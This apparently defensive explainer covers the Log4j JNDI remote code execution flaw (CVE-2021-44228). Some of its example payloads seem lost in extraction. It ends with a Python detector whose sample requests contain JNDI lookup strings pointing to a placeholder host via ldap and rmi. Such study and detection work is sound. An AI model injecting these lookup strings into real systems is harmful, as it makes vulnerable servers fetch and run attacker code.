

Log4j is a popular logging library used in Java by a large number of applications online. To enhance its functionality beyond basic log formatting, Log4j added the ability to perform lookups: map lookups, system properties lookups, as well as JNDI (Java Naming and Directory Interface) lookups. Log4j uses the JNDI API to obtain naming and directory services from several available service providers: LDAP (Lightweight Directory Access Protocol), COS (Common Object Services), Java RMI registry (Remote Method Invocation), DNS (Domain Name Service), etc.

Fig 1: Typical CVE-2021-44228 Exploitation Attack Pattern

Description of the CVE-2021-44228 vulnerability

Log4j versions 2.0 through 2.14.1 have been found to be vulnerable to a Remote Code Execution vulnerability because JNDI does not protect against attacker-controlled directory service providers.

Typically, a JNDI lookup would look like this: $ in the request:

Or using an HTTP POST command and burying the malicious request in the POST body:

This POST form would probably not succeed at exploiting this Log4j vulnerability in most situations because the POST body is usually not logged.
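An added detection example (not from the original page): it scans the URI, headers and POST body of parsed HTTP requests for JNDI lookup strings and reports where each one appeared, which matters because a POST body is usually not logged while headers and URIs often are. The request dictionaries, host names and function names are constructed for illustration.

```python
import re

# Start of a Log4j JNDI lookup, capturing the provider scheme,
# e.g. "${jndi:ldap://host/a}" -> "ldap". Matching is case-insensitive
# as a conservative detection choice.
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z][a-z0-9+.-]*):", re.IGNORECASE)

def find_jndi_lookups(request):
    """Return (location, scheme) for each JNDI lookup in one request.

    `request` is a dict with 'uri' (str), 'headers' (dict) and 'body' (str);
    this shape is an assumption made for the example.
    """
    fields = [("uri", request.get("uri", ""))]
    fields += [("header:" + name, value)
               for name, value in request.get("headers", {}).items()]
    fields.append(("body", request.get("body", "")))
    hits = []
    for location, value in fields:
        for match in JNDI_LOOKUP.finditer(value):
            hits.append((location, match.group(1).lower()))
    return hits

def scan(requests):
    """Map request index -> hits, keeping only requests with a lookup."""
    results = {}
    for index, request in enumerate(requests):
        hits = find_jndi_lookups(request)
        if hits:
            results[index] = hits
    return results

# Constructed sample requests (not captured traffic).
SAMPLE_REQUESTS = [
    {"uri": "/search?q=shoes", "headers": {"User-Agent": "Mozilla/5.0"}, "body": ""},
    {"uri": "/", "headers": {"User-Agent": "${jndi:ldap://host.example.invalid/a}"},
     "body": ""},
    {"uri": "/login", "headers": {"User-Agent": "curl/7.79"},
     "body": "user=${JNDI:rmi://host.example.invalid/b}"},
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_REQUESTS).items():
        for location, scheme in hits:
            print(f"request {index}: JNDI lookup ({scheme}) in {location}")
```

A hit in `body` is only reachable by Log4j if the application logs the request body, so hits in `uri` and `header:*` locations deserve first attention.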
